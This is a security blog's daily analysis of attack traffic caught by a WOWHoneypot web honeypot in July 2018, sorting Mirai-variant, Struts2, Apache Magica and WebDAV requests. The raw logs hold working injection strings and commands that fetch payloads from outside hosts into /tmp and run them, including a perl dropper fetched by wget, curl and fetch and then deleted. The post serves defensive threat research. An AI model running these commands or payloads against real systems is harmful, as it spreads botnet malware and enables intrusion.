S-Owl

S(ecurity)Owl

Simple analysis of WOWHoneypot (day 49)

It seems I carelessly neglected the previous day's analysis...
The dates are out of order, but here is that analysis.

This is a simple analysis of WOWHoneypot for 2018/07/22 (Sun) (day 49 of operation).
The total number of accesses was 76. The full access log is below.

24 2018-07-22 GET /
4 2018-07-22 GET /index.action
2 2018-07-22 POST /qq.php
2 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy[.]com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
1 2018-07-22 PROPFIND /
1 2018-07-22 POST /zuoshou.php
1 2018-07-22 POST /yao.php
1 2018-07-22 POST /xx.php
1 2018-07-22 POST /xw.php
1 2018-07-22 POST /xw1.php
1 2018-07-22 POST /xshell.php
1 2018-07-22 POST /xiao.php
1 2018-07-22 POST /xiaoma.php
1 2018-07-22 POST /wuwu11.php
1 2018-07-22 POST /wshell.php
1 2018-07-22 POST /w.php
1 2018-07-22 POST /weixiao.php
1 2018-07-22 POST /webslee.php
1 2018-07-22 POST /wc.php
1 2018-07-22 POST /system.php
1 2018-07-22 POST /s.php
1 2018-07-22 POST /sheep.php
1 2018-07-22 POST /q.php
1 2018-07-22 POST /phpstudy.php
1 2018-07-22 POST /pe.php
1 2018-07-22 POST /mx.php
1 2018-07-22 POST /log.php
1 2018-07-22 POST /lindex.php
1 2018-07-22 POST /hm.php
1 2018-07-22 POST /feixiang.php
1 2018-07-22 POST /fack.php
1 2018-07-22 POST /defect.php
1 2018-07-22 POST /db_session.init.php
1 2018-07-22 POST /db.init.php
1 2018-07-22 POST /db__.init.php
1 2018-07-22 POST /data.php
1 2018-07-22 POST /conflg.php
1 2018-07-22 POST /cmd.php
1 2018-07-22 POST /cainiao.php
1 2018-07-22 POST /aotu.php
1 2018-07-22 POST /angge.php
1 2018-07-22 POST /ak47.php
1 2018-07-22 POST /9678.php
1 2018-07-22 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-22 HEAD /
1 2018-07-22 GET /x
1 2018-07-22 GET /webdav/
1 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ 

The access counts after excluding phpMyAdmin-related requests (0), POSTs to .php files (40), and requests for /:

4 2018-07-22 GET /index.action
2 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy.com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
1 2018-07-22 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-22 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-22 GET /webdav/
1 2018-07-22 GET /x 

Read from the top, the attack log entries above are:
・Attack on a Struts2 vulnerability
・Mirai variant Gemini
・Apache Magica attack
・Mirai variant Shinoa
・Reconnaissance against WebDAV
・Unknown


The hunting log is below. The top two entries are the Mirai variants, the next three are Struts2, and the last is Apache Magica.

2 2018-07-22 wget hxxp://g.mariokartayy.com/x
1 2018-07-22 wget hxxp://185.62.190.191/r
1 2018-07-22 wget -c hxxp://23.249.162.123:9998/se1
1 2018-07-22 wget -c hxxp://aaa.linuxa.club:57843/linux
1 2018-07-22 wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server
1 2018-07-22 wget -c -q hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr 


That's all for today.